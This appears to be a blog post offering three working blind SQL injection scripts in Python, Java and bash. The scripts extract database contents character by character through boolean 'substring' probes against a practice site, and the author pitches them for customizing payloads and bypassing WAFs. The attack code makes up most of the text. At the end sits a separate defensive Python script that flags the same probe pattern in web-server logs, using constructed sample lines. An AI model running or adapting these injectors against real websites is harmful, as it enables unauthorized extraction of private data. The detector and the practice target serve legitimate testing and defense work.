Automated Blind SQL Injector
There are lots of tools available for blind SQL injection, but when it comes to customizing payloads and bypassing WAFs I thought of writing my own program to extract data based on true and false boolean conditions.
This is the Python version: https://github.com/OsandaMalith/BSSQLi/blob/master/bssqli.py
import urllib2  # Python 2
import re
# CC-BY: Osanda Malith Jayathissa (@OsandaMalith)
# https://creativecommons.org/licenses/by/2.0/
url = 'http://testphp.vulnweb.com/artists.php?artist=2'  # target
payload = '(select user())'  # your payload
trueString = 'Blad3'  # Text or html in the true condition
maxLength = 20
result = ''
for i in range(1, maxLength + 1):  # character position
    for j in range(32, 127):  # printable ASCII candidates
        if chr(j).isupper():
            # the comparison is case-insensitive under MySQL's default collation,
            # so uppercase candidates would only repeat the lowercase hits
            continue
        sql = " and substring(" + payload + "," + str(i) + ",1)=" + hex(j) + "-- -"
        target = url + sql
        req = urllib2.Request(target)
        # If cookies exist
        # req.add_header('Cookie','value=1;value=2')
        page = urllib2.urlopen(req)
        html = page.read()
        if re.search(r'(.*)' + trueString + '(.*?) .*', html, flags=re.DOTALL):
            print('Found: ' + chr(j))
            result += chr(j)
            break  # move on to the next position
print(result)
This is the Java version I wrote. The URL and the true string are hard coded; the length and the payload are passed on the command line. Edit the URL, compile, then run:
java BSSQL 20 "select user()"

https://github.com/OsandaMalith/BSSQLi/blob/master/BSSQL.java
import java.net.*;
import java.io.*;
// CC-BY: Osanda Malith Jayathissa (@OsandaMalith)
// https://creativecommons.org/licenses/by/2.0/
/*
The URL and the true string are hardcoded. After compiling run like this:
java BSSQL 20 "select table_name from information_schema.tables where table_schema=database() limit 0,1"
Result:
artists
Done!
*/
public class BSSQL {
    private static String url = "http://testphp.vulnweb.com/artists.php?artist=2"; // target
    private static String trueString = "Blad3"; // Text or html in the true condition
    private static String hex;
    private static char ch;

    public static void main(String[] args) throws Exception {
        int maxLength = 0;
        String payload = "";
        if (args.length < 2) {
            System.err.println("Usage: " + BSSQL.class.getName() + " length " + "\"payload\"");
            System.exit(1);
        }
        try {
            maxLength = Integer.parseInt(args[0]);
        } catch (NumberFormatException e) {
            System.err.println("Argument " + args[0] + " must be an integer.");
            System.exit(1);
        }
        payload = args[1];
        System.out.println("Result:");
        for (int j = 1; j <= maxLength; j++) {         // character position
            for (int i = 32; i < 127; i++) {            // printable ASCII candidates
                if (Character.isUpperCase((char) i)) {  // case-insensitive compare: skip uppercase
                    continue;
                }
                ch = (char) i;
                hex = String.format("0x%02x", (int) ch); // zero-padded so no space ends up in the URL
                String p = " and substring((" + payload + ")," + Integer.toString(j) + ",1)="
                        + hex + "-- -";
                String host = url + p;
                URL target = new URL(host);
                URLConnection conn = target.openConnection();
                // conn.setRequestProperty("Cookie", "name1=value1; name2=value2");
                conn.connect();
                BufferedReader in = new BufferedReader(new InputStreamReader(
                        conn.getInputStream()));
                String inputLine;
                boolean found = false;
                while ((inputLine = in.readLine()) != null) {
                    if (inputLine.contains(trueString)) {
                        System.out.print(Character.toString((char) i));
                        found = true;
                        break;
                    }
                }
                in.close();
                if (found) {
                    break; // move on to the next position
                }
            }
        }
        System.out.println("\nDone!");
    }
}
This is the bash version; it's faster than the above two. https://github.com/OsandaMalith/BSSQLi/blob/master/bssqli.sh

#!/bin/bash
# CC-BY: Osanda Malith Jayathissa (@OsandaMalith)
# https://creativecommons.org/licenses/by/2.0/
# ./bssqli.sh 20 "select user()"
URL="http://testphp.vulnweb.com/artists.php?artist=2"  # target
truestring="Blad3"                                      # text or html in the true condition
maxlength=$1
query=$2
result=""
# candidate characters for each position: digits, letters and a few punctuation marks
charset=$(echo {0..9} {A..x} \. \: \, \- \_ \@)
for ((j=1; j<=maxlength; j++)); do
    for i in $charset; do
        # hex-encode the candidate so the comparison needs no quotes
        str=$(printf '%s' "$i" | od -A n -t x1 | sed 's/ //g')
        hex=0x$str
        if curl -s "$URL and substring(($query),$j,1)=$hex-- -" | grep -q "$truestring"; then
            echo "Found: $i"
            result+=$i
            break
        fi
    done
done
echo "Result: $result"
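All three scripts send probes of one fixed shape, and substring((<query>),<pos>,1)=0x<hh>-- -, and spend one request per candidate character, which is exactly what a defender can key on in web-server logs. The following Python 3 script, added here and not part of the BSSQLi project, URL-decodes the request path of each access-log line, matches that probe shape, and reports client/endpoint pairs whose probe count crosses a threshold; the log lines, client addresses and threshold are constructed for the demonstration.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Probe shape after URL-decoding, as sent by the scripts above:
#   ... and substring((<query>),<pos>,1)=0x<hh>-- -
# The position index and the 0x-encoded candidate byte are the stable parts.
PROBE_RE = re.compile(
    r"\band\s+substring\s*\(.*?\)\s*,\s*(\d+)\s*,\s*1\s*\)\s*=\s*0x[0-9a-f]{2}", re.I)
# Combined-log prefix: client, ident, user, [time], "METHOD path ..."
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')

def is_probe(path):
    """Return the character position a request tests, or None if it is not a probe."""
    m = PROBE_RE.search(unquote_plus(path))
    return int(m.group(1)) if m else None

def find_extraction_bursts(log_lines, threshold=10):
    """Count probes per (client, endpoint) and return {key: {position: count}}
    for pairs at or above threshold; normal users do not produce this pattern."""
    hits = defaultdict(Counter)
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand
        client, path = m.groups()
        pos = is_probe(path)
        if pos is not None:
            hits[(client, path.split("?", 1)[0])][pos] += 1
    return {k: dict(v) for k, v in hits.items() if sum(v.values()) >= threshold}

def constructed_log():
    """Constructed sample log, not real traffic: one client walking four
    positions with three candidates each, one benign request, one stray probe."""
    fmt = '{ip} - - [10/Oct/2023:13:55:{s:02d} +0000] "GET {path} HTTP/1.1" 200 5123 "-" "{ua}"'
    probe = "/artists.php?artist=2%20and%20substring((select%20user()),{pos},1)={hx}--%20-"
    lines = [fmt.format(ip="203.0.113.9", s=0, path="/artists.php?artist=2", ua="Mozilla/5.0")]
    s = 1
    for pos in range(1, 5):
        for hx in ("0x61", "0x62", "0x63"):
            lines.append(fmt.format(ip="10.0.0.5", s=s, path=probe.format(pos=pos, hx=hx), ua="curl"))
            s += 1
    lines.append(fmt.format(ip="198.51.100.4", s=s, path=probe.format(pos=1, hx="0x61"), ua="curl"))
    return lines

if __name__ == "__main__":
    for (client, endpoint), positions in find_extraction_bursts(constructed_log()).items():
        print(f"{client} -> {endpoint}: {sum(positions.values())} probes, positions {sorted(positions)}")
```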
